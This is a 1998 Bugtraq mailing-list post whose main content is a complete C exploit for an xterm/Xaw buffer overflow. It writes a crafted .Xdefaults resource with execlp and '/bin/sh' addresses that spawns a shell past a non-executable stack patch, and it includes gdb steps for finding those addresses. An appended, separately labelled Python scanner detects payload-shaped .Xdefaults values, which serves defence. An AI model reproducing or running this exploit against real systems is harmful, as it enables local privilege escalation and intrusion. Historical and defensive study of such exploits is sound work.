[7082] in bugtraq
Re: dip-3.3.7p exploit (stackpatch_
daemon@ATHENA.MIT.EDU (M.C.Mar)
Sun Jun 28 13:21:59 1998
Date: Sun, 28 Jun 1998 14:04:19 +0200
Reply-To: "M.C.Mar" <emsi@it.com.pl>
From: "M.C.Mar" <woloszyn@NOSPAM.IT.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.GSO.3.95.980626174552.25728A-100000@faui01a.informatik.uni-erlangen.de>
On Fri, 26 Jun 1998, Thomas Troeger wrote:
> Hi,
>
> While playing around with dip-3.3.7p I realized that the method I used in my
> previous posting won't do. So I had a look at the source and developed a new
> program. Here it goes:
>
(...)
So.. I also developed some time ago an xploit that works around the non-executable
stackpatch (Linux), but for the xterm and Xaw vulnerability.
It seems that defeating Solar's stackpatch is easier than we thought if the
program contains any exec* PLT entry. If it contains exec*p we may use any
string to execute ./_anystring_ if we have . in the PATH variable.
So here goes my 'sploit:
$ cat 3xterm.c
/*
A simple xploit working around non-executable stack patch! ;)
Based on Solar Designer's: "Getting around non-executable stack(fix)" post and:
Rafał Wojtczuk's "Defeating Solar Designer's Non-executable Stack Patch"
sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets based on
xterm_exp.c by alcuin
Compile it like this:
gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc
Description:
The sploit simply puts the EXECLP address and its parameters addresses
onto the stack. To work fine you need to look for execlp Program Linkage
Table entry in xterm and for "/bin/sh" string in its text segment...
emsi:~mcmar/hack# gdb xterm
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
(gdb) print execlp
$1 = {<text variable, no debug info>} 0x804bc78 <execlp>
(gdb) x/s 0x8063d2e
0x8063d2e <_fini+8158>: "/bin/sh"
0x804bc78 and 0x8063d2e are OK for me, but you may need to look for the
right ones in your case... ;)
GreetZ: bulba, smierc, all of Lam3rZ teem and other Polish HackerZ ;)
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>     /* memset, strncmp */
#include <ctype.h>
#include <unistd.h>     /* chdir, execl */
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"
#define EXECLP 0x804bc78 // execlp PLT address in xterm
#define BIN_SH 0x8063d2e // "/bin/sh" string address in xterm ;)
int *ptr;
int main(int argc, char *argv[]) {
    char *home;
    FILE *f_in, *f_out;
    char buff[16384];
    char shellbuf[16384];
    char *s;
    /* work in $HOME, where xterm reads .Xdefaults from */
    if ((home = getenv("HOME"))) chdir(home);
    if (!(f_out = fopen(NEWFILE, "w"))) {
        perror("fopen");
        exit(1);
    }
    /* copy the existing .Xdefaults, dropping any old xterm*inputMethod line */
    if ((f_in = fopen(CONFFILE, "r"))) {
        while (fgets(buff, sizeof(buff), f_in)) {
            for (s = buff; isblank(*s); s++);
            if (strncmp(s, "xterm*inputMethod", 17) != 0)
                fputs(buff, f_out);
        }
        fclose(f_in);
    }
    /* fill the buffer with nops */
    memset(shellbuf, 0x90, sizeof(shellbuf));
    shellbuf[sizeof(shellbuf)-1] = 0;
    /* at offset 1028: execlp PLT address, a fake return address for it,
       then the two "/bin/sh" pointers it reads as its arguments; the
       trailing 0 terminates the string so fputs stops here */
    ptr = (int *)(shellbuf+1028);
    *ptr++ = EXECLP;
    *ptr++ = EXECLP;
    *ptr++ = BIN_SH;
    *ptr++ = BIN_SH;
    *ptr++ = 0;
    fputs("xterm*inputMethod:", f_out);
    fputs(shellbuf, f_out);
    fclose(f_out);
    system("/bin/cp "CONFFILE" "OLDFILE);
    system("/bin/mv -f "NEWFILE" "CONFFILE);
    execl("/usr/X11R6/bin/xterm", "xterm", NULL);
    perror("execl");   /* only reached if xterm could not be started */
    return 1;
}
It contains some useless stuff, but it's 'coz I just used the normal xterm
sploit as a base.
RegardZ,
--
___________________________________________________________________________
M.C.Mar An NT server can be run by an idiot, and usually is. emsi@it.pl
"If you can't make it good, make it LOOK good." - Bill Gates
This may not be the place, but M$ programs, for example, are peculiar monuments to stupidity.
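Added example, not part of the post above and not code from xterm, Xaw or any of the tools it mentions: a small Python scanner that reads a ~/.Xdefaults file and flags resource values shaped like the payload the sploit writes (a multi-kilobyte value of 0x90 bytes with a few binary words inside it), which is what an administrator or host-based checker would look for. The thresholds (MAX_VALUE_LEN, the 16-byte NOP run) and the sample resource file are constructed assumptions; the 4-byte words in the sample are placeholders, not addresses from any real binary.

```python
import re
import sys
from typing import Any, Dict, List

# Assumed thresholds (not from the post): a legitimate X resource value is
# short printable text, while the payload is ~16 KiB of 0x90 bytes with a
# few little-endian addresses embedded in it.
MAX_VALUE_LEN = 1024
NOP_RUN_RE = re.compile(rb"\x90{16,}")   # 16 or more consecutive x86 NOP bytes


def parse_xdefaults(data: bytes) -> List[Dict[str, Any]]:
    """Split raw .Xdefaults bytes into {line, name, value} records.

    X resource lines look like 'name: value'; lines starting with '!' are
    comments.  Only the first ':' separates name from value, and the value
    is kept as raw bytes so binary junk survives for inspection.
    """
    records: List[Dict[str, Any]] = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(b"!") or b":" not in stripped:
            continue
        name, value = stripped.split(b":", 1)
        records.append({"line": lineno, "name": name.strip(), "value": value.strip()})
    return records


def suspicious_reasons(value: bytes) -> List[str]:
    """Return the heuristics a resource value trips; empty if it looks benign."""
    reasons: List[str] = []
    if len(value) > MAX_VALUE_LEN:
        reasons.append(f"value length {len(value)} exceeds {MAX_VALUE_LEN}")
    if NOP_RUN_RE.search(value):
        reasons.append("long run of 0x90 (x86 NOP) bytes")
    non_printable = sum(1 for b in value if b < 0x20 or b > 0x7E)
    if non_printable:
        reasons.append(f"{non_printable} non-printable bytes in a text resource")
    return reasons


def scan_xdefaults(data: bytes) -> List[Dict[str, Any]]:
    """Scan a whole resource file and report every value that trips a heuristic."""
    findings: List[Dict[str, Any]] = []
    for rec in parse_xdefaults(data):
        reasons = suspicious_reasons(rec["value"])
        if reasons:
            findings.append({"line": rec["line"],
                             "name": rec["name"].decode("latin-1"),
                             "reasons": reasons})
    return findings


# Constructed sample: two ordinary resources, then a value shaped like the
# post's payload (1028 NOP bytes followed by pairs of 4-byte little-endian
# words).  The word values are placeholders, not addresses from any binary.
SAMPLE_XDEFAULTS = (
    b"! constructed sample .Xdefaults\n"
    b"xterm*font: fixed\n"
    b"XTerm*background: black\n"
    b"xterm*inputMethod:" + b"\x90" * 1028
    + (0x08040000).to_bytes(4, "little") * 2
    + (0x08060000).to_bytes(4, "little") * 2
)


if __name__ == "__main__":
    # Scan the file named on the command line, or the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = SAMPLE_XDEFAULTS
    for finding in scan_xdefaults(blob):
        print(f"line {finding['line']}: {finding['name']}: "
              + "; ".join(finding["reasons"]))
```

Run it as `python3 scan_xdefaults.py ~/.Xdefaults` to check a real file; with no argument it scans the constructed sample and reports only the oversized, non-printable inputMethod value. Each heuristic is independent, so a payload that avoids NOP padding is still caught by the length and non-printable checks.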